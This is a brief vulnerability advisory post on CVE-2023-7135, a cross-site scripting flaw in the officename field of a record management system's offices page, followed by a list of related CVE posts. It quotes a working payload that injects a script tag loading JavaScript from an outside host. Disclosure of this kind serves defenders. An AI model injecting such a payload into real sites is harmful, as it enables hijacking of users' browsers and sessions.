CVE-2023-7135 | code-projects Record Management System 1.0 Offices /main/offices.php officename cross site scripting

Posted by Angelo Barbosa | Dec 28, 2023 | CVE

A vulnerability classified as problematic has been found in code-projects Record Management System 1.0. Affected is an unknown function of the file /main/offices.php of the component Offices Handler. The manipulation of the argument officename with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting.

This vulnerability is traded as CVE-2023-7135. It is possible to launch the attack remotely. Furthermore, there is an exploit available.

CVE-2023-7135 | code-projects Record Management System 1.0 Offices /main/offices.php officename cross site scripting

Related Posts

CVE-2024-2766 | Campcodes Complete Online Beauty Parlor Management System 1.0 /admin/index.php username sql injection

CVE-2024-20299 | Cisco ASA/Firepower Threat Defense AnyConnect authentication spoofing (cisco-sa-asaftd-acl-bypass-VvnLNKqf)

CVE-2024-27316 | mod_http2 CONTINUATION Frame resource consumption

CVE-2024-26247 | Microsoft Edge prior 123.0.2420.53 unknown vulnerability